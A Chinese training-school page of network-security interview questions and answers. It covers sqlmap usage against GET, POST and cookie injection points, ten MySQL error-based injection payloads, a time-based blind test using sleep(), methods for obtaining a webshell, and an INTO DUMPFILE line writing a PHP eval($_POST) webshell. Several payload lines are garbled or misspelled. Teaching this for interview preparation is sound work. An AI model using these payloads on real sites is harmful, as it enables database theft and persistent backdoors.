千鋒教育-做有情懷、有良心、有品質的職業(yè)教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > 【匯總】網絡安全常見面試題(二)

【匯總】網絡安全常見面試題(二)

來源:千鋒教育
發(fā)布人:syq
時間: 2022-07-25 16:48:59 1658738939

  1、sqlmap,怎么對一個注入點注入?

網絡安全常見面試題

  1)如果是 get 型號,直接,sqlmap -u "諸如點網址".

  2) 如果是 post 型諸如點,可以 sqlmap -u "注入點網址” --data="post 的參數(shù)"

  3)如果是 cookie,X-Forwarded-For 等,可以訪問的時候,用 burpsuite 抓包,注入處用號替換,放到文件里,然后 sqlmap -r "文件地址"

  2、sql 注入的幾種類型?

  1)報錯注入

  2)bool 型注入

  3)延時注入

  4)寬字節(jié)注入

  3、報錯注入的函數(shù)有哪些?10 個

  1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通過 floor 報錯 向下取整 3)

  +and

  updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from

  test

  where id=1 and geometrycollection((select from(selectfrom(select

  user())a)b));5).multipoint()select from test where id=1 and

  multipoint((select from(select

  from(select

  user())a)b));6).polygon()select from test where

  id=1 and polygon((select

  from(select

  from(select user())a)b));7).multipolygon()select from test where id=1 and

  multipolygon((select from(select from(select user())a)b));8).linestring()select from test

  where id=1 and linestring((select from(select

  from(select

  user())a)b));9).multilinestring()select from

  test where id=1 and multilinestring((select

  from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select

  * from(select user())a));

  4、延時注入如何來判斷?

  if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

  5、如何拿一個網站的 webshell?

  上傳,后臺編輯模板,sql 注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經爆出的 cms 漏洞,比如 dedecms 后臺可以直接建立腳本文件,wordpress 上傳插件包含腳本文件 zip 壓縮包等

  6、sql 注入寫文件都有哪些函數(shù)?

  select '一句話' into

  outfile '路徑'select '一句話' into dumpfile '路徑'select '

  eval($_POST[1]) ?>'

  into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

  7、如何防止 CSRF?

  1,驗證 referer

  2,驗證 token

  8、owasp 漏洞都有哪些?

  1)SQL 注入防護方法:

  2)失效的身份認證和會話管理

  3)跨站腳本攻擊 XSS

  4)直接引用不安全的對象

  5)安全配置錯誤

  6)敏感信息泄露

  7)缺少功能級的訪問控制

  8)跨站請求偽造 CSRF

  9)使用含有已知漏洞的組件

  9、未驗證的重定向和轉發(fā)49、SQL 注入防護方法?

  1)使用安全的 API

  2)對輸入的特殊字符進行 Escape 轉義處理

  3)使用白名單來規(guī)范化輸入驗證方法

  4)對客戶端輸入進行控制,不允許輸入 SQL 注入相關的特殊字符

  5)服務器端在提交數(shù)據(jù)庫進行 SQL 查詢之前,對特殊字符進行過濾、轉義、替換、刪除。

  更多關于網絡安全培訓的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經驗,采用全程面授高品質、高體驗培養(yǎng)模式,擁有國內一體化教學管理及學員服務,助力更多學員實現(xiàn)高薪夢想。

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業(yè)內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT